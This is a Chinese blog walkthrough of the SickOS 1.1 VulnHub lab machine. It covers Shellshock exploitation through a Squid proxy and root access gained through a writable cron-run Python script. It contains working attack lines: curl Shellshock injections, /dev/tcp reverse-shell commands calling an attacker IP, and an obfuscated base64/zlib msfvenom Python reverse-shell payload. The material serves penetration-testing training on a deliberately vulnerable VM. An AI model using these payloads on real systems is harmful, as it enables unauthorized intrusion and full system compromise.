SickOS1.1 - Shellshock原理和利用过程精讲

于 2024-06-01 01:11:50 发布
阅读量976 收藏 9
点赞数 29
分类专栏: 红队打靶 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82000839/article/details/139363994
版权

SickOS1.1的另一种思路;用另一种方法打透这台机器

微信公众号

Nikto扫描

正常都是-h扫描;有代理就用-useproxy 指向的代理ip:端口

nikto -h 192.168.218.157 -useproxy 192.168.218.157:3128

apache版本,有点低,现在都是2.4.54版本了,可能也有漏洞利用方法、同样也有squid/3.1.19

还提示了一个OSVBD的一个编号,shellshock漏洞,应该是关于apche的

image-20240531223535986

shellshokc漏洞原理

/cgi-bin/status目录

通过bash获得权限、只要通过环境变量与bash有操作的,4.1版本之前都可以的,

shellshokc验证

curl -v --proxy http://192.168.218.157:3128 http://192.168.218.157/cgi-bin/status -H "Refer:() {  test;}; echo 'Content-Type: text/plan'; echo; /usr/bin/id;exit"

这里我们使用curl

-v更丰富信息

–proxy指定代理服务器

uid=33(www-data) gid=33(www-data) groups=33(www-data)这个就说明有shellshokc

image-20240531235748513

shellshock获取初始系统shell

生成payload

msfvenom -p cmd/unix/reverse_bash lhost=192.168.218.145 lport=443 -f raw

bash -c '0<&84-;exec 84<>/dev/tcp/192.168.218.145/443;sh <&84 >&84 2>&84'

运行payload

curl -v --proxy http://192.168.218.157:3128 http://192.168.218.157/cgi-bin/status -H "Refer:() {  test;}; 0<&84-;exec 84<>/dev/tcp/192.168.218.145/443;sh <&84 >&84 2>&84"curl

开启监听,但是sh好像出问题了

没有那个文件或者路径

image-20240601000827451

msfvenom生成的不完全对,sh未必环境变量设好,就没法使用,简写的路径不行,要写成完整的路径

image-20240601001156372

cron自动任务提权

将sh改为/bin/sh就可以了

dpkg -l可以看一下装了哪些软件

image-20240601001332552

解决下shell问题;一般是python

python -c 'import pty;pty.spawn("/bin/bash")'

目前到这里我们可以继续上一篇文章思路继续走,我们再找一找其他更好方法

看一下sudo -l 要密码,我们通过反弹shell获得交互式,暂时无法走通这个路

看一下本地文件内status

image-20240601002350526

看到这想到上一个靶机进行自动任务提权条件,root;然后cho “/bin/bash -i >& /dev/tcp/192.168.218.145/4443 0>&1” >> /usr/lib/cgi-bin/status

运行./,确实能够再次交互,但不是root用户,还是相同用户,回头一想,这可能不是自动任务,还是以本地用户权限运行,可以使用sudo来运行,但咱不知道www-data密码,所以这个路也不行

换个思路,这个用户www-data主要是为网站使用,进入html看有啥提示;html进不去,那就逐级进入看

image-20240601003458236

看一下robots.txt就是暴露wolf管理系统信息

image-20240601003557521

看一下.bash_history历史记录;没什么有用信息

image-20240601003647062

再往下看文件;打印两句话,我试着非常频繁地连接事物,您可能想尝试我的服务;

那可能是定时任务;

image-20240601003749396

当然在实战中不会有这样的提示,我们攻击要形成即使不提示都要对这些基本能提权的思路去提取信息

进入/etc/看一下crontab

貌似没啥东西

image-20240601004510830

但我们也看到了cron.d;顺便也看一下

他说这是一个路径

image-20240601004615834

ls -laih看一下

.placeholder是一个占位符

automate说每分钟以root权限python运行/var/www/connect.py文件;那我们思路就很明确了

image-20240601004822550

rooted

既然他是py文件,那我们就用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.218.145 lport=222 -f raw

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNp9j0ELwjAMhf9K6akF6WxRmYwehkwQUcHtPlytbDjbsnT/35VVvC2XkPe9vJDu4+zgEVj11h6tUCgYGzdYpQGiYCFDrQUvMd8LxncpEzxlfLPFGQrrUgiRIZBzCpsbiVN+rE/Xovplz2J5O5zrsroX+YVOm0xZY7TyhIQz0RqS6UQtsOfoBAH26nptLKHRsF6CfAmKCTr5/5OpR98TnDSdSaDF9AvvrlGY')[0])))"

这个写入python文件的编辑器非常诡异

vi与vim;看博主说用vi,按o是另起一行,然后粘贴,

esc然后冒号wq,可能只是视图效果不好吧

image-20240601010200741

cat看一下,正常

image-20240601010219572

监听;有反应,root用户;a0216ea4d51874464078c618298b1367.txt与上一篇文章一样,自动任务提权也完成了

image-20240601010528598

总结

nikto扫描出shellshock漏洞、使用curl指定代理服务器测试一下,正常,使用msfvenom生成bash的反弹shell,是初级权限用户,进行信息收集,自动化任务有提权方法,构造py再次获得反弹shell,再次拿到root

lu-fe1
关注
  • 29
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
「红队笔记」靶机SickOS1.1 - Shellshock原理利用过程
m0_73612768的博客
11-29 905
本文是作者在观看B站《红队笔记》后做的一些笔记及相关知识补充
「红队笔记」靶机SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1197
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
【Vulnhub靶机】SickOS1.1--Squid代理以及ShellShock漏洞利用
过期的秋刀鱼
12-10 927
文档 说明:https://www.vulnhub.com/entry/sickos-11,132/
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1047
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 220
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习
qq_34801745的博客
01-10 2917
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月11日 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并...
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1862
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 ...
pokemon-gpt-2
04-23
此存储库包含训练GPT-2模型和选择的图像所需的一切,然后使用该模型生成新图像。 Google Colab笔记本 您很有可能可以直接使用Google Colab(并使用闪亮的免费GPU)做您想做的事情: 档案文件 对于那些想要在本地...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8301
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
30天学会医学统计学你准备好了吗
06-27
30天学会医学统计学你准备好了吗,暑假两个月总得学点东西吧,医学生们最需要的,冲啊
213ssm_mysql_jsp 图书仓储管理系统_ruoyi.zip(可运行源码+sql文件+文档)
06-27
根据需求,确定系统采用JSP技术,SSM框架,JAVA作为编程语言,MySQL作为数据库。整个系统要操作方便、易于维护、灵活实用。主要实现了人员管理、库位管理、图书管理、图书报废管理、图书退回管理等功能。 本系统实现一个图书仓储管理系统,分为管理员、仓库管理员和仓库操作员三种用户。具体功能描述如下: 管理员模块包括: 1. 人员管理:管理员可以对人员信息进行添加、修改或删除。 2. 库位管理:管理员可以对库位信息进行添加、修改或删除。 3. 图书管理:管理员可以对图书信息进行添加、修改、删除、入库或出库。 4. 图书报废管理:管理员可以对报废图书信息进行管理。 5. 图书退回管理:管理员可以对退回图书信息进行管理。 仓库管理员模块包括;1. 人员管理、2. 库位管理、3. 图书管理、4. 图书报废管理、5. 图书退回管理。 仓库操作员模块包括: 1. 图书管理:仓库操作员可以对图书进行入库或出库。 2. 图书报废管理:仓库操作员可以对报废图书信息进行管理。 3. 图书退回管 关键词:图书仓储管理系统; JSP; MYSQL 若依框架 ruoyi
城市二次供水智慧化运行管理经验分享
06-27
城市二次供水智慧化运行管理是指利用现代信息技术,如物联网(IoT)、大数据、云计算、人工智能等,对城市二次供水系统进行智能化改造和优化管理,以提高供水效率、保障水质安全、降低运营成本和提升服务质量。以下是一些智慧化运行管理的经验: 1. 智能监测与数据采集 传感器部署:在二次供水系统中部署各种传感器,如流量计、压力计、水质监测设备等,实时收集关键数据。 数据集成:将来自不同设备和系统的数据集成到一个统一的平台,便于管理和分析。 2. 大数据分析与决策支持 数据分析:利用大数据技术对收集到的数据进行分析,识别异常模式,预测潜在问题。 决策支持:通过数据分析结果,为运营管理人员提供决策支持,如优化供水调度、预测维护需求等。 3. 自动化控制与优化 自动化系统:实现供水泵站、阀门等设备的自动化控制,根据实时数据自动调整运行参数。 优化算法:应用优化算法,如遗传算法、神经网络等,对供水系统进行优化,提高能效和减少浪费。 4. 云计算与远程管理 云平台:将数据存储和处理迁移到云平台,实现数据的远程访问和共享。 远程监控:通过云平台实现对二次供水系统的远程监控和管理,提高响应速度和灵活性。
mysql选择1232
06-27
mysql选择1232
《Java编程思想》学习笔记1(操作符、控制语句、对象、初始化与清理).doc
最新发布
06-27
《Java编程思想》学习笔记1(操作符、控制语句、对象、初始化与清理).doc
sick0s靶场搭建
09-08
你好!对于搭建SickOS靶场,你可以按照以下步骤进行操作: 1. 首先,你需要一个虚拟化平台,比如VirtualBox或VMware Workstation,用于创建和管理虚拟机。 2. 下载SickOS的ISO文件,可以在官方网站上找到。SickOS是一个专门设计的漏洞靶场,用于学习和实践渗透测试技术。 3. 在虚拟化平台中创建一个新的虚拟机,并将SickOS的ISO文件作为虚拟机的光驱。 4. 启动虚拟机,并按照提示进行安装。你可以选择默认设置或自定义设置,根据你的需求进行配置。 5. 完成安装后,启动虚拟机,并确保网络连接正常。 6. 在主机上下载和安装Kali Linux或其他渗透测试工具。这些工具可用于攻击和测试SickOS中的漏洞。 7. 确保主机和虚拟机在同一网络中,并配置网络设置以便它们可以相互通信。 8. 确保虚拟机的防火墙设置允许从主机访问。 9. 现在,你可以开始使用Kali Linux或其他工具对SickOS进行渗透测试了。尝试利用其中的漏洞来获取系统权限或执行其他攻击。 请注意,渗透测试和攻击活动可能涉及法律和道德问题。在进行这些活动之前,请确保你有合法的授权,并且只在合法的环境中进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值